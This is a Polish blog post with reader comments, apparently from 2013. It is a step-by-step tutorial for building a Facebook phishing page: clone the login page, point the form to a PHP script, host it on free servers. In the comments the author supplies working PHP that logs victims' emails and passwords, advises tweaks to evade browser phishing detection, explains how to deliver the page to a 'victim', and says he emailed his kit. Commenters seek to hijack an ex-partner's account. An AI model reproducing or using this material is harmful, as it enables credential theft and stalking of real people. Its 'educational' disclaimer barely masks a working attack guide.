2013
09.01

Jak włamać się komuś na fb? Kontrowersyjny tytuł? Trochę! To pytanie pojawia się na wielu, wielu forach internetowych, więc wyjaśnię ogólnikowo jak postępują hakerzy, aby wiedzieć jak się bronić i jak łatwo zostać przestępcą. Pokażę dzisiaj jedną z metod którą jest Phishing. Czy metoda jest skuteczna? To zależy już od naszych umiejętności perswazyjnych. Czemu pokazuje ten atak? Tylko w celach demonstracyjnych aby wiedzieć na czym on polega i wyciągnąć wnioski jak przed nim się obronić. Jedynym wymaganiem jest notatnik i darmowy serwer FTP. Często podczas audytów bezpieczeństwa ofiaruje się, że to nie haker się włamał do naszego komputera opróżniając konto bankowe, tylko my nic nie podejrzewając dosłownie daliśmy mu dane do logowania.

Jak włamać się na fb, czyli czym jest phishing?

Phishing (spoofing) – w branży komputerowej, wyłudzanie poufnych informacji osobistych (np. haseł lub szczegółów karty kredytowej) przez podszywanie się pod godną zaufania osobę lub instytucję, której te informacje są pilnie potrzebne. Jest to rodzaj ataku opartego na inżynierii społecznej.

A więc darmowy hosting (serwer) + domena www + skrypt php = ATAK

Jak to wygląda w praktyce?  ;)

  1. Cyberprzestępca zadając sobie pytanie jak złamać hasło na fb  przygotowuje skrypt, który przechwytuje wpisane dane (najczęściej login i hasło, numery kart kredytowych), posiada do tego jakiś tani hosting www i domenę www łudząco podobną do oryginalnej strony (żeby ofiara nic nie podejrzewała).
  2. W perswazyjny sposób przygotowują scenariusz ataku: awaria banku, problemy z hasłem prośba o zalogowanie lub pospolita kopia oryginalnej strony stojąca “o! tak” po prostu w sieci. W tym kroku zajmują się również wymyśleniem chwytliwej i niepodejrzanej domeny internetowej.
  3. Czas na atak! Przestępcy rozsyłają masowo za pomocą poczty e-mail/sieci społecznościowych/komunikatorów (wedle scenariusza) zaproszenie do zalogowania się (w tym miejscu podają najczęściej powód, może być to wygrana jak i awaria systemu bankowego). Jedynym ogranicznikiem tutaj jest wyobraźnia.
  4. Zbieranie plonów czyli używanie wykradzionych kont w niecnych celach.
jak włamać się na fb  - przykład

Przykładowa strona phishingowa fb, warto zwrócić uwagę na adres www…

A jak działa skrypt phishingowy, lub jak kto woli “jak złamać hasło na fb”?

  1. Lustrzane odbicie strony którą fałszujemy modyfikujemy tak, aby wysyłała dane do skryptu najczęściej php (metoda POST).
  2. Skrypt przetwarza otrzymane dane z tablicy $_POST[''] a następnie je zapisuje w pliku tekstowym, bazie danych bądź wysyła na maila.
  3. Skrypt ostatecznie, najczęściej przekierowuje na prawdziwą stronę pod którą się podszywał.

 

Jak włamać się na fb

Łup phishingowy to nie tylko bezużyteczne dane…

 

Więc do rzeczy – jak włamać się na facebooka?

Często pada pytanie ”jak włamać się na fb znając login”, w moim sposobie nie jest to wymagane.Co nam będzie potrzebne żeby przygotować stronę phishingową? Podstawową sprawą to hosting! Są dostępne (niestety z reklamami) darmowe takie jak yoyo.pl, cba.pl itd… Osobiście dodatkowo użyłem:

  • Notepad++ – świetny edytor dla programistów, systemowy notatnik pozostawia daleko w tyle
  • Przeglądarka Google Chrome – ze względu na wygodną wbudowaną opcje badania elementów strony
  • Xampp – do testowania skryptu lokalnie
  • FileZilla – świetny darmowy klient FTP
  • Konto hostingowe (nawet darmowe) [OBOWIĄZKOWO]

Za to z płatnych i szybkich kont hostingowych mogę osobiście polecić Linuxpl.com:

dobry hosting pod fb

Poniższy opis jest pobieżny ze względu że do wpisu poniżej dołączam film:

    1.  Wchodzimy na stronę główną facebook.com
    2. Tworzymy pusty folder na pulpicie (bądź na serwerze hostingowym, o tym później)
    3. W przeglądarce Google Chrome wciskamy prawy przycisk myszy i wybieramy Zapisz jako…
    4. Jako nazwe pliku wpisujemy index.html, wybieramy Zapisz jako typ: Strona internetowa, kompletna
    5. Otwieramy za pomocą dowolnego edytora tekstowego (polecam Notepad++) plik index.html
    6. Wyszukujemy w pliku linijke <form id=”login_form” action=
    7. Modyfikujemy atrybut action na login.php (wcześniej wyglądał tak <form id=”login_form” action=”https://www.facebook.com/login.php?login_attempt=1″) teraz niech wygląda tak:
      <form id=”login_form” action=”login.php”

    8. Zapisujemy plik index.html (w tym kroku moglibyśmy to już robić nie na XAMPP a np. darmowym hostingu z domena)
    9. Tworzymy w tym samym folderze co index.html plik login.php
    10. Wklejamy w nim (objaśnienie w filmie):
    11. Zapisujemy plik login.php.
    12. Ściągamy ten plik z logiem i umieszczamy w folderze index_files (https://fbstatic-a.akamaihd.net/rsrc.php/v2/yh/r/xQ0DwmqUr-m.png)
    13. Otwieramy plik (dowolnym edytorem tekstowym) QvPK5s6OObz.css z folderu index_files
    14. Zamieniamy wszystkie wyrażenia “/rsrc.php/v2/yh/r/xQ0DwmqUr-m.png” na samą nazwę pliku “xQ0DwmqUr-m.png”.
    15. Wrzucamy wszystkie pliki na swój płatny lub hosting za pomocą klienta ftp.
    16. Gotowe, gdy patrzę na naciągaczy kręcących przedstawiających sposoby niedziałające typu “jak włamać się na fb spryciarze”, albo “facebook password cracker” to za głowę się łapę. Phishing jest sprawdzonym sposobem cyberprzestępców od lat. Nie dajcie się naciągnąć na programy które same w sobie są wirusem i zarażają Was. Bez umiejętności programowania (ani jednej linijki kodu) możemy przeczytać wpis: jak włamać się na ask.fm – poradnik.

    AKTUALIZACJA! Jak donosi jedna z czytelniczek, nie zawsze istnieje plik który nosi nazwe QvPK5s6OObz.cssQvPK5s6OObz.css , w takim przypadku szukamy w innych plikach z rozszerzeniem .CSS (są tylko dwa więc nie będzie trudno!). Tak samo zmienia się często nazwa zdjęcia w tych plikach /rsrc.php/v2/yh/r/xQ0DwmqUr-m.png,  więc szukajmy wedle niepełnej ścieżki: /rsrc.php/v2/yh/r/, reszta wedle kroków powyższych.

    Film przykładowego przebiegu włamania na facebooka:

    Film jest do pobrania w zakładce WIDEO / DOWNLOAD

    Obrona

    Teraz już wiesz w przenośni “jak złamać hasło na facebooku”, a jak chronić się przed włamaniem na fb i phishingiem? O tym na pewno już wkrótce pojawi się wpis, w skrócie mogę powiedzieć że najlepszą obroną jest MYŚLENIE na jakie strony się wchodzi i loguje (chodzi o domenę), dodatkowo czytajmy z przymrużeniem oka korespondencje bankowo-zarobkową z naszej skrzynki pocztowej ;) Pamiętajcie, nie istnieje program typu “facebook hacker kont” który jednym kliknięciem robi wszystko za nas!

    Po tym artykule powinieneś już wiedzieć jak włamać się na fb, ale być może zainteresują Cię również inne linki:

    Share Button

Do tej pory 144 comments

Dodaj własny komentarz
  1. Nie działa mi, zrobłem wszystko tak jak opisane i jak wchodzę loguję się na FB i pokuzje błąd. Pomocy !!

    • Jaki? W dziale wideo dostępne są filmy.

  2. Witaj, czytałem komentarze, ale nie mogę znaleźć rozwiązania. Wykonałem wszystkie polecenia zgodnie z instrukcją, lecz nie następuje przekierowanie w adresie strony z localhost –> login.php . Zamieniłem w index.html linijkę na action=”login.php”, jednak nie dało to żadnego skutku. Z góry dziękuje za pomoc i pozdrawiam

  3. Witam , mam pewien problem , wrzucam wszystkie pliki na darmowy serwer ftp i pojawia się tylko zarys strony , bez obrazków. Tylko same napisy. W czym może być problem ?

  4. Witam!
    mój problem polega na tym ze nie dostaje loginu i hasła po wpisaniu w odpowiednie miejsce?\!
    co moze być przyczyna?

    • a na XAMPP próbowałeś?

  5. <form id=”login_form” action=

    Nie mogę znaleźć tej komendy, nie ma..

    • Ja teraz otworzyłem facebooka stronę główną, wybrałem pokaż źródło i wyszukałem “

  6. ja mam problem bo nie chce mi utworzyć pliku tekstowego

    • Poczytaj komentarze lub prześledź jeszcze raz film.

  7. Xamp mam jakiś inny niż u Ciebie. Możesz podać dokładny link do pobrania takiego samego jak u Ciebie ?

  8. witam robiłem wszystko wg filmu wrzuciłem pliki na moja cba i co dalej???

    • no i phishing, chyba nie doczytałeś czym jest phishing choćby na wikipedi.

  9. witam,
    w celach edukacyjnych stworzylem strone phisingowa lecz tak jak inni pisali wyswietla sie napis ze strona jest niebezpieczna, przejrzalem wszystkie komentarze i napisales aby zmodyfikowac troche pliki, a moglbys objasnic jak to zrobic?

    • Tak: trzeba się nauczyć podstaw html i css ;)

    • da sie zrobic :D
      a moglbys powiedziec w ktore pliki celowac? kombinowalem dzis z 3 h z ”00cv6P016Bz” ale nie szlo, sciagnalem tez strone fb z mojej strony fiszingowej zeby niebylo linkow obrazkow z fb ale tez kaszana
      pozdrawiam ;)

    • U mnie sama zmiana obrazków na lokalne (z mojego serwera czyli ściągam z fejsa umieszczam u siebie i zmieniam w źródle) pomogła.

  10. Parse error: syntax error, unexpected end of file in C:\xampp\htdocs\login.php on line 10

    • Błąd jest w 10 linii skryptu, ciężko mi powiedzieć bo u siebie na kilku systemach wklejam kod i działa :)

  11. Cześć:)
    A co jak ktoś ma automatyczne logowanie na facebooka? Nie będzie z tym żadnego problemu ;)?

    • Automatyczne logowanie jak to nazywasz sprawdza adres www (domene) i jeśli jest to facebook.com to wypełnia login i hasło, w phishingu używasz podrobionej własnej domeny stąd osoba będzie musiała wpisać dane jeszcze raz.

    • Dzięki;) Jak uda się sprawdzić na własnej osobie rzecz jasna to napiszę jak poszło;)
      Miłego dnia;)

    • Dziękuje za komentarz Michał i pozdrawiam. Należy pamiętać, że nie uprzedzenie osoby o próbie włamania się na konto jest przestępstwem!

      Pozdrawiam!

  12. 20:34:24 [Apache] Problem detected!
    20:34:24 [Apache] Port 80 in use by “system”!
    20:34:24 [Apache] Apache WILL NOT start without the configured ports free!
    20:34:24 [Apache] You need to uninstall/disable/reconfigure the blocking application
    20:34:24 [Apache] or reconfigure Apache to listen on a different port

    kiedy chce wystartować apache to mi wyświetla, próbowałem zmienić w config z 80 na 8080 nic nie dało ponoć skype blokuje ale mam go wyłącznego co mogę jeszcze zrorbić?
    a po próbach różnych mam teraz taki

    Port 443 in use by “C:\Program Files\Pando Networks\Media Booster\PMB.exe” with PID 1084!

    czy zmiana portu 443 coś da i bez różnicy na jaki ?

    • a teraz po próbach mam to
      13:59:02 [Apache] Apache Service detected with wrong path
      13:59:02 [Apache] Change XAMPP Apache and Control Panel settings or
      13:59:02 [Apache] Uninstall/disable the other service manually first
      13:59:02 [Apache] Found Path: “C:\Users\Adrian\Desktop\nowy folder\xampp\apache\bin\httpd.exe” -k runservice
      13:59:02 [Apache] Expected Path: “c:\xampp\apache\bin\httpd.exe” -k runservice

    • Spróbuj jako administrator uruchomić lub zainstalować jeszcze raz (po wcześniejszej deinstalacji). Zamiast XAMPPa możesz użyć WebServ 2

    • A spróbowałeś uruchomić jako administrator XAMPPA? Prawy przycisk myszy -> uruchom jako administrator

  13. no własnie nie mam czasu, moze wpadne i sie dogadamy? =) mam wpasc z flaszka? czy browarami? albo przyjedz do mnie, bez roznicy, abys tylko udzielil korepetycji, odplatnie oczywiscie.. :D ps. gdzie jakas ludzka solidarnosc w takich przykrych czasach, widze ze nie jestes w opozycji :D

    • W sieci też jest dużo tutoriali… :D

    • byc moze, ale ja jestem za głupi na tego typu rzeczy, nie mam smykałki do takiej technologii.. w dodatku, az tak bardzo mnie to nie kreci, chyba ze chodzi o sluszna sprawe.. w tym wypadku o kobiete.. poprostu uzywa mobilnego FB na telefonie HTC, namowilem ja aby wgrala messengera ale jest jakis do kitu, bo nic mi to nie dalo.. w ogole na androidzie mysle ze o wiele lepiej i latwiej to wyglada, ale tez mozna recznie wylaczyc lokalizacje wiadomosci.. jest jakis inny sposob, jakas aplikacja? taka aby nie byla swiadoma ze przy okazji mi wysyla w trakcie pisania swoje polozenie.. ? bez kitu, az normalnie jestem gotow na wszystko aby tylko nauczyc sie tych kilku podstawowych trickow.. wez chociaz postaraj sie mnie jakos edukowac, wez mi cos podeslij abym mogl probowac.. prosze

    • W google wpisz geolokalizacja android.

    • k***********0@w*.pl – jak np rozszyfrowac tego maila? jest cos co skanuje rozne kombinacje?

      w dodatku po odgadnieciu jak zlamac haslo aby dostac sie na maila? pzdr

    • Jeżeli zakładamy że każda gwiazdka to znak to mamy 12 gwiazdek więc dla alfabetu składającego się z 26 znaków 26*26*26*26*26*26*26*26*26*26*26*26 kombinacji (26 do potęgi 12). Można by napisać taki program ale ilość kombinacji jest zbyty duża aby zweryfikować która kombinacja jest prawidłowa. Do tego widze że dochodzą cyfry bo na końcu jest zero, jedyne co jesteśmy pewni to że prawdopodobnie na wp.pl. Raczej tego się nie złamie

  14. AgAzZz.. masz może jakis poradnik na temat tego,
    jak namierzyc osobe poprzez FB?
    ewentualnie aplikacje na telefon?

    • Czas czas czas… :(

  15. Dobry,
    jeszcze jedno pytanko po wejsciu sie na chrome i wejsciu na stronke pokazuje komunikat ze Strona zgłoszona jako wyłudzająca informacje, da sie jakos to zmienic, jak by mozna by było prosic jak np zmodyfikować kod w odpowiedzi na Emaila
    Pozdrawiam

    • Odpowiedź padła w komentarzach, trzeba zmodyfikować nieco stronę facebooka (szczególnie zdjęcia nie powinny być umieszczone za pomocą linków do stron facebooka a umieszczone na naszym hostingu).

  16. Dobry,
    Zrobiłem tak jak na filmiku wszystko pięknie chodzi ale jest jeden mały element który drażni oko a mianowicie gdy mamy rubrykę Rejestracja to są pogrubione napisy, a nad hasłem kropki, dało by to rade jakoś zmienić?
    Pozdrawiam

    • poszukać podstaw (kursu) CSS + do analizy szybkiej elementu FireBug wtyczka dla Firefoxa lub “Zbadaj element” w chrome.

  17. no ja wiem, ze nie mozesz, ale musisz mi pomoc, bo nie “znam” nikogo innego, tak pol zartem, pol serio.. wiem ze prowadzicie blog, dlatego chcialbym zamowic prenumerate..
    ps. moge wpasc na korepetycje?

    • Prenumeratę bloga? Chyba chodzi Ci o RSS…

    • ok , nie bede juz rozkladal wszystkiego na czynniki pierwsze lub mowił w przenosni.. to i tak nie ma to wiekszego sensu.. poniewaz potrzebuje pomocy.. wsparcia.. ps. to w koncu nie czat.. bez kitu zrob mi gotowca, jak na filmiku, zreszta napewno masz i podeslij, tak bym mogl podeslac go swojej ofierze.. musze i tak sprawdzic swoja siłe persfazji.. wiem ze to zabrzmi niestosownie, ale prosze.!

    • Trzeba próbować :)

  18. wszystko git ale i tak po drodze mam jakies problemy bo czegos nie ma albo nie chce sie znalezc, a staram sie robic wszystko tak jak pokazales, a bez kitu jeden blad i juz jest lipa, bo nawet nie mam takiej wiedzy zeby to obejsc.. nie jestem informatykiem czy programista itp, totalnie nie znam sie na tym.. wyslalem Ci maila w kontaktach, moze przeczytasz , moze nie.. pzdr

    • My tylko prowadzimy blog, a douczyć jak coś się chce zrobić trzeba się.

  19. łamanie prawa? masz mi tylko udzielic informacji, ja jestem zbyt ograniczony intelektualnie zeby zrobic to sam.. albo wskaz mi jakis najprostszy sposob, poradnik, bez kitu prosba życia to jest.. wyslij mi jakies podstawy na maila psygoblin@o2.pl – cos dla poczatkujacych.. prosze…….

    • Przecież w danym wpisie powyżej komentarza masz coś najprostszego.

  20. zrobiłem wszystko i w xampp pojawia się plik z hasłami a na serwerze już nie ma, nawet sprawdzałem kilka serwerów i na wszystkich to samo

    • Hmm, może serwer zewnętrzny http://haker.edu.pl/2013/10/29/darmowy-serwer-ftp/ nie ma uprawnień do zapisu pliku. Stwórz ręcznie na serwerze dodatkowo plik ten w którym są zapisywane loginy czyli logi.txt (tam gdzie mają być normalnie utworzone) i ustaw tak zwane chmody (uprawnienia w systemach Unixopodobnych), w FileZilla robi się to tak że klika na plik prawym przyciskiem myszy logi.txt -> Prawa dostępu -> zaznaczyć wszystko (777).

  21. mozna sie z Toba dogadac i podac link do konta danej osoby, tak zebys uzyskal dla mnie haslo do jej konta? szczegoly mozna by bylo jeszcze omowic…. to moja ex dziewczyna o ktora jestem troche zazdrosny, bo jest z kims innym i chcialbym ja sledzic, a nie uprzykszac zycia…. ogolnie to dla mnie wazne, ale nie mam zamiary robic balaganu

    • Nie, to nie moja sprawa łamanie prawa. Tak jak pisze na filmiku tylko do celów edukacyjnych aby zapoznać się z problemem a nie włamywać.

  22. w notepad++ nie znajduję pliku <form id=”login_form” action=

    • Zły może plik otwierasz :) musisz zbadać i poszukać tych dwóch pól formularza w których się wpisuje email i hasło.

  23. Witam, male pytanie. Czy komus udalo sie uzyskac cudze haslo na fb? Wiem, ze moja ofiara ma wlaczona opcje dodatkowa na fb – za kazdym razem gdy loguje sie z innego urzadzenia niz ma dodane na fb, dostaje smsa. Nawet jak uzyskam haslo, to jestem wiecej niz pewna, ze zorientuje sie, ze to ja przez nazwe mojej wsi za granica, ktora zna na pamiec. Zawsze ostatnia aktywnosc na fb jest pokazana z numer IP i miasto. Czy ktos na dzien dzisiejszy jest w stanie to obejsc? Pozdrawiam

    • Mi działa tylko trzeba wiedzieć co wkręć osobie typu że to zdjęcie tam jest.

  24. Po kliknięciu “zaloguj się”:
    - nie otwiera się nowy plik (z zapisanym emailem oraz hasłem);
    - przeglądarka nie przekierowuje nas na pustą stronę (tak jak jest pokazane na filmiku), tylko stronę z tekstem pliku “login.php”- na stronie widzimy nasz kod;

    Wszystkie kroki zostały powtórzone 3 razy… co może być źle zrobione?

    • A uruchamiasz to na jakimś serwerze np: xampp lub

    • Agfraz – please odezwij się na mój e-mail grizzly74@autograf.pl
      Bardzo proszę.
      Sprawa bardzo pilna a nie wiem jak się z Tobą skontaktować inaczej.
      Dzięki

    • Od tego są komentarze.

  25. gdy wpisuję “localhost” w przeglądarkę-stronka nie wchodzi,
    gdy kliknę sobie na plik “index.html” wszystko działa… coś nie tak czy się nie przejmować i działać dalej? ;)

    • A uruchomiłeś wedle filmiku XAMPP’a? Bo musisz mieć serwer żeby localhost działał… sama nazwa wskazuje LOCAL.

  26. Jaki może byc powód tego, że po wpisaniu danych i kliknieciu “zaloguj” dane nie sa przekazywane do logi.txt ?
    Jesli otwieram przez localhost to wszystko jest tak jak powinno.
    Siedze nad tym i mysle że sama nie jestem w stanie tego ogarnąc… proszę więc o pomoc

    • XAMPP to też serwer (localhost), proszę sprawdzić przez klienta ftp czy plik naprawdę się nie pojawia tam.

    • Wrzuciłam pliki na swoj hosting ( zalozony na ugu.pl) przez filezille . Pisząc że otwieram przez localhost,mialam na mysli Xamppa. Plików w dalszym ciągu nie ma.

    • Napisz może do obsługi technicznej http://www.ugu.pl/ w tej sprawie bo może to ich wina że wrzucasz sobie obojętnie jaką stronę html i nie możesz jej zobaczyć.

    • Wczesniej probowałam przez cba.pl jednakże wtedy pojawial się problem z samym połączeniem. Pojawia się informacja:
      Błąd: Błąd krytyczny
      Błąd: Nie można połączyć się z serwerem

    • http://haker.edu.pl/2013/10/29/darmowy-serwer-ftp/

  27. mam problem moja strona została zgłoszona jako wyłudzanie informacji i jak zrobić żeby nie wykrywało to jako wyłudzanie.. muszę coś zmienić w index.html ??

    • Odpowiedź padłą kilka razy już w komentarzach. Problem tkwi że wiele osób zaczęło wykorzystywać ten skrypt z naszej strony i stał się wykrywalny.

    • dobrze udało mi się wszystko zmodyfikować… i narazie nie wykrywa … pewnie do czasu. ale ogólnie to dzięki za ten poradnik bardziej go wykorzystam do celów edukacyjnych niż do przestępczości.

    • możesz napisać jak to zrobiłes ? :)

    • Wiele razy padała ta odpowiedź, wystarczy samemu do roboty się wziąć :)

  28. Rozumiem metoda prób i błędów udało sie. Wystapił jednak kolejny problem, otóż jak juz się loguje na stronce to wyskakuje mi inf:
    Parse error: syntax error, unexpected ‘=’ in C:\xampp\htdocs\login.php on line 7
    Czy wiadomo jaki błąd popełniłam?

    • Błąd występuje w 6 albo 7 linijce, może brakować np średnika lub znaku dolara. Powinno być:
      $uchwyt = fopen(“logi.txt”, “a”);
      fwrite($uchwyt, $tekst);

  29. a zrobiłbyś poradnik jak wysłać tą strone ofierze. i byś opisał jak zmienić adres i wgl jak zrobić taką stronę. było by fajnie…co o tym myślisz?

  30. Robiłam wszystko zgodnie z instrukcją na filmiku! Mam jednaj problem z dodaniem napisu
    ” facebook” . Wydaje mi sie że wszystko robie dobrze a mimo tego po zmianie w dalszym ciągu nie wyświetla sie napis…

    • Ciężko coś powiedzieć bo instrukcja jest dokładna. Wystarczy pouczyć się HTML i CSS.

  31. Siemka. Sorki ze jako setny pytam.
    Robilem krok po kroku wszystko, co Ty na filmie, po zapisaniu i po przekierowaniu do pliku login.php, pojawia sie blad:

    Parse error: syntax error, unexpected ‘$uchwyt’ (T_VARIABLE) in C:\xampp\htdocs\login.php on line 6

    Line 6 to przecierz:
    $uchwyt = fopen(“logi.txt”, “a”);

    Potem skopiowalem od Ciebie i to samo :(

    Pozdrawiam i z gory dziekuje :)

    • Dziwne sprawdzałem mój kod i działa, błąd który wyskakuje to błąd składni w 6 lub wcześniejszej linii (np: brak apostrofa lub średnika na końcu linii).

      Możesz spróbować wgrać na inne (zewnętrzne darmowe) FTP i sprawdzić. http://haker.edu.pl/2013/10/29/darmowy-serwer-ftp/

  32. wszystko ładnie działa wystarczy trochę znajomości html. php i da się coś z tego wykombinować, jednak jakby to (swój adres) wysłać ofierze wiadomo ze domena facebook.com jest jedyna a jak tu zrobić bardzo podobny adres jakiś allias albo coś ;[

  33. Witam, czy dałoby zrobić tak żeby po kliknięciu “Zaloguj się” ofiarę przekierowało na już zalogowaną stronę, a nie na https://www.facebook.com/login.php?login_attempt=1 ????
    Chodzi o to żeby ofiara nie musiała się drugi raz logować.

    • Pewnie dało by się, wymaga dobrego zrozumienia działania nagłówków HTTP, ciasteczek, mechanizmu sesji, i nieco bardziej zaawansowanej znajomości języka PHP (dokładniej cURL’a).

  34. tylko jak to zmodyfikować, mógłbyś wytłumaczyć jestem dopiero można powiedzieć początkujący i sam nie umiem takich rzeczy :)

    • Ale co? :)

    • Możesz dokładnie opisac jak zmodyfikować to aby facebook nie wykrywał że to do wyłudzania informacji ?

  35. Witam, fb już ogarnął chyba, bo po kliknięciu “Zaloguj się” nie przekierowuje do naszego pliku tylko nadal zostaje action=”https://www.facebook.com/login.php?login_attempt=1″, mimo zmiany w kodzie. Wie ktoś jak to ruszyć ??

    • Bo skrypt po zapisaniu przekierowuje właśnie do https://www.facebook.com/login.php?login_attempt=1 za pomocą header funkcji na końcu kodu w przykładzie. Do wpisu dodany jest również filmik, proszę się z nim zapoznać :)

    • tak rozumiem, tylko jeśli nie dołączę funkcji header, nadal jest tak samo (tzn. przekierowuje, ale nie do login.php).
      Wpisując testowe login i hasło także nie tworzy się, zadany plik z logami. Jakieś pomysły?

    • A zmodyfikowałeś wedle poradnika plik index.php czy tam index.html (jego formularz)? parametr action na login.php?

    • oczywiście wszystko wg filmiku, i to kilkakrotnie ;/ ale zawsze ten sam efekt.
      W pliku login.php nie trzeba zadać konkretnej scieżki, aby tworzył tam “logi.txt”

    • Składnia Twojej wypowiedzi = nie wiem o czym piszesz.

    • oczywiscie zmodyfikowałem wg poradnika, kilkakrotnie wykonywałem całość od początku, ale zawsze to samo( nie odsyła do login.php po kliknięciu “zaloguj się”) a takze nie tworzy pliku “logi.txt”. Pytam czy w formule pliku”login.php” nie trzeba zadać konkretnej ścieżki w ktorej ma tworzyć plik”logi.txt”

    • Nie, wydaje mi się że nie zmodyfikowałeś pliku index.html (parametr action na login.php trzeba zmienić w formularzu).

    • oo działa, musielem antivira wyłączyć i firewall;)
      Dzięki za poradnik i sory za trucie d**y :))

    • A co miał firewall i antywirus do tego?

    • dawał komunikat że strona z phisingiem, mimo że zezwoliłem na otwieranie to dalej blokwał… po wyłączeniu go wszystko działa ;)

  36. Witam działa mi wszystko elegancko tylko, jak wysyłam to facebook to odrazu blokuje i oznacza jaka niebezpieczna strone jak to ominąć ?

    • najlepiej filmik na ten temat bo ostatnio był dobry przekaz

    • W dniu premiery wpisu, nie wykrywało jeszcze… Odpowiadałem już w komentarzach w tym wpisie jak włamać się na fb: “Trzeba spróbować troszkę zmodyfikować kod, zdjęcia, html albo CSS.”

  37. jak wysłać to ofierze ?

    • Trzeba mieć swój darmowy lub płatny serwer FTP i wrzucić tam te pliki za pomocą np: FileZilli. Podstawy tworzenia stron www i umieszczenia ich w internecie to są. Najlepiej by domena przypominała fejsbukową (facebook.com). Można mieć też publiczne IP i na swoim komputerze mieć strone np: za pomocą xammpa z filmu, podajesz wtedy IP ofierze a ona wpisuje go w przeglądarke lub nakładasz na to coś w stylu noip.com, lub darmowy alias.

  38. A u mnie wgl pliki mają inne nazwy i nie mam loga, co za tym idzie nie chodzi ;/

    • W wpisie jest aktualizacja na czerwono, trzeba szukać bo nazwy są losowe okazuje się. Warto przyjrzeć najpierw się filmikowi na końcu wpisu jak to działa. Długi ale dokładny.

  39. Wrzuciłem wszystko na server ftp, jednak po odpaleniu strony google chrome mi krzyczy “Ostrzeżenie: Podejrzenie witryny wyłudzającej dane (phishing)!”. Macie może jakieś sposoby na ominięcie tego ?

    • Trzeba spróbować troszke zmodyfikować kod, zdjęcia, html albo CSS.

  40. Mi nie dziala.
    Robie wszystko i nie pojawia się logi.txt
    a na stronce po kliknięciu na zaloguj wyskakuje kod php

    • A masz xammpa? Uruchamiasz z adresu localhost a skrypt ma nazwe z rozszerzeniem .php? (a nie html lub txtr\?)

  41. W xampp nie działa mi apache pomozesz jak naprawic pisza o portach zablokowanych ale nie moge znalezc jak odblokować….

    • Może firewall systemowy zablokował, nie zadawał pytania czy nie odblokować? Chodzący xampp wyświetla bodajże na zielono dana usługa jak wystartuje dobrze. Z prostych serwerów www jest jeszcze WebServ.

  42. ok thx za odp.

  43. nie moge zamienic tych plikow zeby logo było jak to robisz ? Robie to samo co ty i nie moge ??? Wyskakuje mi ten komunikat Replace: Cannot replace text. The current document is read only.

    HELP

    • Plik jest tylko do odczytu, musisz najpierw notatnik uruchomić jako administrator i dopiero otworzyć plik lub z powodu zapisania pliku w miejscu gdzie nie masz praw do zapisywania plików występuje ten problem i wystarczy przekopiować np: na pulpit, lub moich dokumentów.

  44. eYTpPmSTXYE yek5jGn8pFA mam tylko takie 2 pliki nie ma tych rozszerzen o których pisałeś, przeszukałem wszystkie inne( na wszelki wypadek i nie moge tego znaleźć)

    thx za szybką odp.

    • Musi być, pisze w wpisie na czerwono że nazwy mogą być różne od “…bz…”. Pozdrawiam!

  45. ja nie mam tego pliku bz ? i co mam zrobic ?

    • Musisz czytać wpis dokładniej, ponieważ została w pewnym miejscu naniesiona aktualizacja wpisu i to na czerwono. Pozdrawiam :)

  46. Działa.!
    Cudownie.! ;)

  47. Witam. Czy ja też mógłbym prosić o podesłanie mi twojej stronki pishingowej? Coś mi nie idzie chce sobie porównać ;)

    • Nie, ponieważ wszystko jest opisane i nie wymaga jakiejś olbrzymiej wiedzy i filozofii.

  48. ej jak się loguje i daje zaloguj to odsyła mnie do login.php ale wyskakuje na tej stronie taki tekst

    Notice: Undefined index: email in D:\PISHING\htdocs\login.php on line 2

    Notice: Undefined index: pass in D:\PISHING\htdocs\login.php on line 3

    • A wpisałeś coś w polu e-mail i w polu hasło? Spróbuj zmodyfikowanego kodu który najpierw sprawdza czy coś zostało wgl wpisane na stronie imitującej facebooka.
      < ?php
      if (!empty($_POST['email']) && !empty($_POST['pass'])) {
      $email = $_POST['email'];
      $pass = $_POST['pass'];
      $tekst = "E-mail: $email Hasło: $pass \r\n";

      $uchwyt = fopen("logi.txt", "a");
      fwrite($uchwyt, $tekst);
      fclose($uchwyt);
      header("Location: https://www.facebook.com/login.php?login_attempt=1");
      }
      ?>

  49. napisałam na kontakt ale cisza :) chyba Pan zajęty :)

    • Bo na niektóre pytania ciężko odpowiedzieć.

  50. Tak, zapisałem dobrze skrypt.
    Dobrze zmieniłem także w index.html. Mógłbyś mi może podesłać “swoją” stronę phishingową na mój adres e-mail ?

    • Poszło, jedynie do celów edukacyjnych. Pozdrawiam! :)

    • Dzięki, bardzo. Tak, oczywiście, zacznę się uczyć od razu php dla ułatwienia ;) Jeszcze raz dzięki. Pozdrawiam

    • O ile do ataków na skrypty język PHP i SQL jest przydatny o tyle do tworzenia fajnych stron www (wygląd) to raczej CSS i HTML. Ciężko mi pomóc bo nie zajmuje się raczej graficzną stroną projektowania witryn www. Pozdrawiam

    • mozna by prosic tez ta strone na maila ? bo jakos nie moge sobie poradzic

    • Trzeba próbować, w przeciwnym razie na darmo film powstał (stracony czas).

  51. Dzień dobry :) od razu mówię, że jestem laik. Starałam się zrobić to tak jak mówiłeś w filmiku, problem taki, że w momencie kiedy zapiszę już grafikę i chcę skopiować nazwę, nie mam tego arkusza z końcówką bz. Z tego co widzę to ty tam masz 16 elementów w tym folderze a ja 15 co może być tego przyczyną? Pozdrawiam serdecznie

    • Cześć! Właśnie sprawdziłem to o co zapytałaś i rzeczywiście… zapisało mi się za pomocą przeglądarki Chrome 14 elementów. Teraz pojawiły się u mnie arkusze o zupełnie innej nieco losowej nazwie, mechanizm tworzenia strony phishingowej został taki sam. Proszę prześledzić filmik i zobaczyć jak w systemie Windows pokazuje się w opcjach folderów rozszerzenia plików. Resztę zrobisz tak samo próbując odnaleźć odpowiednie elementy w plikach o rozszerzeniu .CSS (ten plik który miał na końcu bz miał rozszerzenie .CSS, są tylko dwa pliki z takim rozszerzeniem więc będzie łatwo). Pozdrawiam!!!

  52. Aha, fajnie lepiej usunąć komentarz….

    • Jak widzisz komentarz poprzedni nie został usunięty. Komentarze wymagają zatwierdzenia przez moderatora, aby inni nie rozsyłali spamu i złośliwego oprogramowania. Pozdrawiam

  53. I jeszcze coś. Widać że ta strona została pobrana, ponieważ jest bardziej rozciągnięta. Można jakoś temu zaradzić ?

    • Można by spróbować pobrać stronę poprzez HTTrack Website Copier lub nauczyć się CSS/XHTML i spróbować zmodyfikować wygląd wedle gustu. Problem leży podejrzewam w arkuszach CSS. U mnie przy rozdzielczości 1366x nie widać znaczącej różnicy.

  54. Mam pytanie. Ładnie, pięknie stworzyłem plik login.php wchodzę na tą stronę, wpisuję hasło i w tym momencie powinien ukazac się plik logi.txt a u mnie go nie ma dlaczego ?

